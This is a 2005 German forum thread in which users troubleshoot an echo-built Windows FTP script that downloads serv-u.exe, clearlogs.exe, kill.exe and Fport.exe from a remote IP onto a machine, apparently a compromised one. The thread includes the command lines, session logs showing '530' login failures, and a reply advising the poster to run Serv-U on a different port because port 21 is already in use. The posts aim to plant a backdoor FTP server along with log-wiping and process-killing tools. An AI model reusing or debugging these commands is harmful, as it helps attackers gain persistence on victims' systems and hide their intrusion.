Prob bei echo methode

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von gammler, 22. Juni 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 22. Juni 2005
    Und zwar krieg ich immer folgende meldung nachdem ich nach flogendem schema die txt angelegt hab:

    echo open xxx.xxx.xxx.xxx>>c:\ftpscr.txt
    echo anonymous>>c:\ftpscr.txt
    echo anonymous@lol.com>>c:\ftpscr.txt
    echo BINARY>>c:\ftpscr.txt
    echo get serv-u.exe>>c:\ftpscr.txt
    echo get serv-u.ini>>c:\ftpscr.txt
    echo get clearlogs.exe>>c:\ftpscr.txt
    echo get kill.exe>>c:\ftpscr.txt
    echo get Fport.exe>>c:\ftpscr.txt
    echo quit>>c:\ftpscr.txt


    Nun führe ich das ganze mit folgendem Befehl aus:

    ftp -n -v -s:c:\ftpscr.txt


    Und dann kommt immer folgendes:

    Connected to 210.66.118.131.

    open 210.66.118.131
    220 Microsoft FTP Service
    Invalid command.

    Invalid command.

    anonymous
    anonymous@lol.com
    BINARY
    530 Please login with USER and PASS.

    get serv-U.exe
    530 Please login with USER and PASS.

    530 Please login with USER and PASS.

    get serv-u.ini
    530 Please login with USER and PASS.

    get clearlogs.exe
    530 Please login with USER and PASS.

    get kill.exe
    530 Please login with USER and PASS.

    get Fport.exe
    530 Please login with USER and PASS.

    quit
    221


    Am ende sind dann keine files oben ich frage mich was das 530 soll wenn es sich um einen pub handelt ??

    greetz
     
  2. 22. Juni 2005
    was soll das da??
     
  3. 22. Juni 2005
    das hat das board da hingemacht also hab ich nicht verwendet beim anlegen der txt.


    greetz
     
  4. 22. Juni 2005
    hab das gleiche problem!

    ich denke das liegt an dem befehl: "echo anonymous>>c:\ftpscr.txt"
    wieß jeamdn wie das richtig funzt?

    mein log:
    Code:
    Connected to xxx
    
    open xxxx
    220 Y2003 Microsoft FTP Service (Version 5.0).
    Invalid command.
    
    Invalid command.
    
    anonymous
    anonymous@lol.com
    BINARY
    530 Please login with USER and PASS.
    
    get sys.exe
    200 PORT command successful.
    530 Please login with USER and PASS.
    
    get sys.ini
    200 PORT command successful.
    530 Please login with USER and PASS.
    
    get clearlogs.exe
    200 PORT command successful.
    530 Please login with USER and PASS.
    
    get kill.exe
    200 PORT command successful.
    530 Please login with USER and PASS.
    
    get Fport.exe
    200 PORT command successful.
    530 Please login with USER and PASS.
    
    quit
    221 

    Gruss sypher
     
  5. 23. Juni 2005
    Es läuft bereits ein FTP-Service auf Port 21.

    Konfiguriert Serv-U auf einem anderen Port.

    und dann:
     
  6. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.